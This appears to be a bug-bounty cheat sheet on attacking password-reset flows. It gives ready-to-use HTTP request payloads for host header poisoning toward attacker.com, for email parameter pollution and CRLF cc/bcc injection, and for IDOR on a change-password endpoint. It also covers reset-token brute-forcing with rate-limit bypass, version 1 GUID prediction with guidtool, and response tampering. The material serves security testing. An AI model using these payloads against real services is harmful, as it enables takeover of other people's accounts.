If you find a host header attack and it’s out of scope, try to find the password reset button!
- Intercept the password reset request in Burpsuite
- Add following header or edit header in burpsuite(try one by one)
Host: attacker.com
Host: target.com
X-Forwarded-Host: attacker.com
Host: target.com
Host: attacker.com
- Check if the link to change the password inside the email is pointing to attacker.com
- Add attacker email as second parameter using &
POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
- Add attacker email as second parameter using %20
POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
- Add attacker email as second parameter using |
POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
- Add attacker email as second parameter using cc
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
- Add attacker email as second parameter using bcc
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
- Add attacker email as second parameter using ,
POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
- Add attacker email as second parameter in json array
POST /resetPassword
[...]
{"email":["victim@mail.tld","atracker@mail.tld"]}
- Attacker have to login with their account and Go to the Change password function
- Start the Burp Suite and Intercept the request
- After intercepting the request sent it to repeater and modify parameters Email and Password
POST /api/changepass
[...]
("form": {"email":"victim@email.tld","password":"12345678"})
- Start the Burp Suite and Intercept the password reset request
- Send to intruder
- Use null payload
pattern of password reset token
If it
- Generated based Timestamp
- Generated based on the UserID
- Generated based on email of User
- Generated based on Firstname and Lastname
- Generated based on Date of Birth
- Generated based on Cryptography
Use Burp Sequencer to find the randomness or predictability of tokens
There are different types of GUIDs:
- Version 0: Only seen in the nil GUID ("00000000-0000-0000-0000-000000000000").
- Version 1: The GUID is generated in a predictable manner based on:
- The current time
- A randomly generated "clock sequence" which remains constant between GUIDs during the uptime of the generating system
- A "node ID", which is generated based on the system's MAC address if it is available
- Version 3: The GUID is generated using an MD5 hash of a provided name and namespace.
- Version 4: The GUID is randomly generated.
- Version 5: The GUID is generated using a SHA1 hash of a provided name and namespace.
Tools: guidtool
guidtool -i 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c
UUID version: 1
UUID time: 2021-11-17 17:52:18.141000
UUID timestamp: 138564643381410000
UUID node: 17547390002044
UUID MAC address: 0f:f5:91:f2:a3:7c
UUID clock sequence: 3426
If the used version to generate a reset password GUID is the version 1, it's possible to bruteforce GUIDS:
guidtool 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000
a34aca00-47d0-11ec-8d62-0ff591f2a37c
a34af110-47d0-11ec-8d62-0ff591f2a37c
Look for Request and Response like these
HTTP/1.1 401 Unauthorized
(“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)
// Change Response
HTTP/1.1 200 OK
(“message”:”success”,”statusCode:200,”errorDescription”:”Success”)
- Check if the expired token can be reused
Try to bruteforce the reset token using Burpsuite
POST /resetPassword
[...]
email=victim@email.com&code=$BRUTE$
- Use IP-Rotator on burpsuite to bypass IP based ratelimit.
- Try adding your password reset token with victim’s Account
POST /resetPassword
[...]
email=victim@email.com&code=$YOUR_TOKEN$
When a user logs out or reset his password, the current session should be invalidated. Therefore, grab the cookies while the user is logged in, log out, and check if the cookies are still valid.
Repeat the process changing the password instead of logging out.
The reset tokens must have an expiration time, after it the token shouldn't be valid to change the password of a user.
- Use username@burp_collab.net and analyze the callback
- User carbon copy email=victim@mail.com%0a%0dcc:hacker@mail.com
- Long password (>200) leads to DoS
- Append second email param and value